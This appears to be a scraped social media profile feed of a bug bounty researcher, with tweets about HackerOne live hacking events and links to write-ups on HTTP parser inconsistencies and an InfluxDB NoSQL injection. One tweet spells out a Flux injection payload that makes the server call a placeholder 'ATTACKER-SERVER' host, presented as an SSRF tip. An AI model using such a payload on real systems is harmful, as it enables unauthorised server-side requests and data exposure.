Security Researcher rafa.hashnode.dev/

Joined August 2023
Pinned Tweet
17 Aug 2023
check out my latest research (Exploiting HTTP Parsers Inconsistencies): rafa.hashnode.dev/exploiting…

rafa retweeted
We’re excited to announce the top 3 winners from H1-361 Bali 🌴🏆 Huge congrats to these incredible security researchers for an unforgettable live hacking event: 🥇 1st Place — @nahuelrm_ 🥈 2nd Place — @zere 🥉 3rd Place — @joaxcar Thanks to everyone who joined us in Bali and helped make this event a great week of collaboration and community. #TogetherWeHitHarder
10 Nov 2025
Had an awesome time hacking alongside @busf4ctor and @monkehack at the H1-3120 Live Hacking Event in Amsterdam by @Hacker0x01, partnered with Salesforce!
rafa retweeted
10 Nov 2025
Amsterdam brought the 🔥! @salesforce #H13120 = one incredible Live Hacking Event 🇳🇱 Security researchers tackled AI challenges head-on—finding vulnerabilities, sharing insights, and shaping the future of secure innovation. #HackForGood #AISecurity #TogetherWeHitHarder
If you ever need help with a bug, you can always count on our community! 🫂
28 Sep 2025
I’m very pleased to share that I was invited by @Hacker0x01 to participate in the Live Hacking Event H1-468 in Sweden, with all expenses covered under the Platform Performer recognition!
rafa retweeted
Unbelievable exploitation journey documented in a thread in the #critical-thinkers on the CTBB Discord. Shout out to @rafabyte_ for finding the solution, and @TomAnthonySEO for doing WORK. Assists: @joaxcar, Balint, @J0R1AN, @kevin_mizu @7urb01, and yours truly, among others.
27 Oct 2023
My research (Exploiting HTTP Parsers Inconsistencies) now has a dedicated page on HackTricks! book.hacktricks.xyz/pentesti…

29 Aug 2023
Did you know that this is a valid payload for SSRF? ") |> yield(name: "1337") from(bucket: "1337", host:"https://ATTACKER-SERVER") |> range(start:0) // yield(name: "1337") from(bucket: "1337", host:"https://ATTACKER-SERVER") |> range(start:0) //">example.com/?id=") |%3… Check out my post where I explain that: rafa.hashnode.dev/influxdb-n… #bugbountytips

rafa retweeted
22 Aug 2023
#100DaysOfHacking Day 16: - Still bug hunting :D (Currently trying to bypass WAF for XSS) - Found a cool research about exploiting HTTP Parsers Inconsistencies rafa.hashnode.dev/exploiting…

rafa retweeted
Exploiting HTTP Parsers Inconsistencies by Rafael da Costa Santos rafa.hashnode.dev/exploiting… #BBRENewsletter59 Subscribe to get the next issue: bbre.dev/nl
17 Aug 2023
Just published a post detailing how I developed an exploit for a NoSQL Injection for InfluxDB and how I escalated this issue into an SSRF and XSS: rafa.hashnode.dev/influxdb-n…

rafa retweeted
Check out the latest issue of BBRE Newsletter🔥 bbre.dev/59